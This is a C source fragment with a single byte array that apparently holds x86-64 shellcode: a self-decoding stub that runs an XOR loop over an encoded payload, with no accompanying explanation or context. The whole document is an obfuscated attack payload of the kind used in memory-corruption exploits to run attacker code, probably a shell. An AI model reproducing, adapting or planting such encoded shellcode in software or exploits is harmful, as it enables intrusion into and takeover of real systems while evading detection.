unsigned char buf[] = 
"\xeb\x27\x5b\x53\x5f\xb0\x9c\xfc\xae\x75\xfd\x57\x59\x53"
"\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f"
"\x29\x27\x74\x07\x80\x3e\x9c\x75\xea\xeb\xe6\xff\xe1\xe8"
"\xd4\xff\xff\xff\x02\x9c\xe9\x25\x59\x51\x5d\xb2\x63\xfe"
"\xac\x77\xff\x55\x5b\x51\x5c\x88\x04\x32\x05\x4a\xfd\xc5"
"\x4a\xfd\xc4\x64\x83\x3d\x07\x57\x76\x05\x82\x3c\x63\x77"
"\xe8\xe9\xe4\xfd\xe3\xea\xd6\xfd\xfd\xfd\x03\x63\xf4\xe5"
"\x53\x4b\xbc\x2c\x61\x6a\x6d\x2c\x2c\x70\x6b\x54\x4b\x8a"
"\xe4\xb3\x38\x0c\x06\x07\x57\x29\x27";
